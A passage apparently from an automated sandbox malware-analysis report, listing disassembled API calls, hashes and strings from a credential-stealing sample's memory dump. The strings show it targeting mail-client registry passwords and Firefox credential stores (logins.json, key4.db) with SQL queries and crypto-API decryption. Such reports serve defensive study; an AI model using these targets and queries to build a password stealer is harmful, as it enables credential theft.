                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                    • String ID:
                    • API String ID: 3143880245-0
                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFontIndirect_mbscpymemset
                    • String ID: Arial
                    • API String ID: 3853255127-493054409
                    • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                    • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                    APIs
                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                    • _strcmpi.MSVCRT ref: 0040CEC3
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_strcmpimemset
                    • String ID: /stext
                    • API String ID: 520177685-3817206916
                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                    APIs
                    • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                    • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                    • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                    • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                    APIs
                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc
                    • String ID:
                    • API String ID: 145871493-0
                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                    APIs
                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itoamemset
                    • String ID:
                    • API String ID: 4165544737-0
                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                    APIs
                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                    APIs
                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                    APIs
                    • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                    APIs
                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                    APIs
                    • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                    • API String ID: 2238633743-192783356
                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscmpstrlen
                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                    • API String ID: 3963849919-1658304561
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID: (yE$(yE$(yE
                    • API String ID: 1865533344-362086290
                    APIs
                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                    • memset.MSVCRT ref: 0040E5B8
                    • memset.MSVCRT ref: 0040E5CD
                    • _mbscpy.MSVCRT ref: 0040E634
                    • _mbscpy.MSVCRT ref: 0040E64A
                    • _mbscpy.MSVCRT ref: 0040E660
                    • _mbscpy.MSVCRT ref: 0040E676
                    • _mbscpy.MSVCRT ref: 0040E68C
                    • _mbscpy.MSVCRT ref: 0040E69F
                    • memset.MSVCRT ref: 0040E6B5
                    • memset.MSVCRT ref: 0040E6CC
                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                    • memset.MSVCRT ref: 0040E736
                    • memset.MSVCRT ref: 0040E74F
                    • sprintf.MSVCRT ref: 0040E76D
                    • sprintf.MSVCRT ref: 0040E788
                    • _strcmpi.MSVCRT ref: 0040E79E
                    • _strcmpi.MSVCRT ref: 0040E7B7
                    • _strcmpi.MSVCRT ref: 0040E7D3
                    • memset.MSVCRT ref: 0040E858
                    • sprintf.MSVCRT ref: 0040E873
                    • _strcmpi.MSVCRT ref: 0040E889
                    • _strcmpi.MSVCRT ref: 0040E8A5
                    Similarity
                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                    • API String ID: 4171719235-3943159138
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                    • GetWindowRect.USER32(?,?), ref: 00410487
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                    • GetDC.USER32 ref: 004104E2
                    • strlen.MSVCRT ref: 00410522
                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                    • ReleaseDC.USER32(?,?), ref: 00410580
                    • sprintf.MSVCRT ref: 00410640
                    • SetWindowTextA.USER32(?,?), ref: 00410654
                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                    • GetClientRect.USER32(?,?), ref: 004106DD
                    • GetWindowRect.USER32(?,?), ref: 004106E7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                    • GetClientRect.USER32(?,?), ref: 00410737
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                    Similarity
                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                    • String ID: %s:$EDIT$STATIC
                    • API String ID: 1703216249-3046471546
                    APIs
                    • memset.MSVCRT ref: 004024F5
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • _mbscpy.MSVCRT ref: 00402533
                    • _mbscpy.MSVCRT ref: 004025FD
                    Similarity
                    • API ID: _mbscpy$QueryValuememset
                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                    • API String ID: 168965057-606283353
                    APIs
                    • memset.MSVCRT ref: 00402869
                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                    • _mbscpy.MSVCRT ref: 004028A3
                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                    • _mbscpy.MSVCRT ref: 0040297B
                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                    Similarity
                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                    • API String ID: 1497257669-167382505
                    APIs
                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                    • LoadCursorA.USER32(00000067), ref: 0040115F
                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                    • EndDialog.USER32(?,00000001), ref: 0040121A
                    • DeleteObject.GDI32(?), ref: 00401226
                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                    • ShowWindow.USER32(00000000), ref: 00401253
                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                    • ShowWindow.USER32(00000000), ref: 00401262
                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                    • memset.MSVCRT ref: 0040128E
                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                    Similarity
                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                    • String ID:
                    • API String ID: 2998058495-0
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                    • API String ID: 231171946-2189169393
                    Similarity
                    • API ID: _mbscat$memsetsprintf$_mbscpy
                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                    • API String ID: 633282248-1996832678
                    Strings
                    • , xrefs: 00406834
                    • key4.db, xrefs: 00406756
                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                    Similarity
                    • API ID: memcpy$memcmp$memsetstrlen
                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                    • API String ID: 3614188050-3983245814
                    Similarity
                    • API ID: sprintf$memset$_mbscpy
                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                    • API String ID: 3402215030-3842416460
                    APIs
                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                      • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                      • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                    • strlen.MSVCRT ref: 0040F139
                    • strlen.MSVCRT ref: 0040F147
                    • memset.MSVCRT ref: 0040F187
                    • strlen.MSVCRT ref: 0040F196
                    • strlen.MSVCRT ref: 0040F1A4
                    • memset.MSVCRT ref: 0040F1EA
                    • strlen.MSVCRT ref: 0040F1F9
                    • strlen.MSVCRT ref: 0040F207
                    • _strcmpi.MSVCRT ref: 0040F2B2
                    • _mbscpy.MSVCRT ref: 0040F2CD
                    • _mbscpy.MSVCRT ref: 0040F30E
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    Similarity
                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                    • String ID: logins.json$none$signons.sqlite$signons.txt
                    • API String ID: 1613542760-3138536805
                    Similarity
                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                    • API String ID: 1012775001-1343505058
                    APIs
                    • memset.MSVCRT ref: 00444612
                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                    • strlen.MSVCRT ref: 0044462E
                    • memset.MSVCRT ref: 00444668
                    • memset.MSVCRT ref: 0044467C
                    • memset.MSVCRT ref: 00444690
                    • memset.MSVCRT ref: 004446B6
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                      • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                    • memcpy.MSVCRT ref: 004446ED
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                      • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                    • memcpy.MSVCRT ref: 00444729
                    • memcpy.MSVCRT ref: 0044473B
                    • _mbscpy.MSVCRT ref: 00444812
                    • memcpy.MSVCRT ref: 00444843
                    • memcpy.MSVCRT ref: 00444855
                    Similarity
                    • API ID: memcpymemset$strlen$_mbscpy
                    • String ID: salu
                    • API String ID: 3691931180-4177317985
                    APIs
                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                    • API String ID: 2449869053-232097475
                    APIs
                    • sprintf.MSVCRT ref: 0040957B
                    • LoadMenuA.USER32(?,?), ref: 00409589
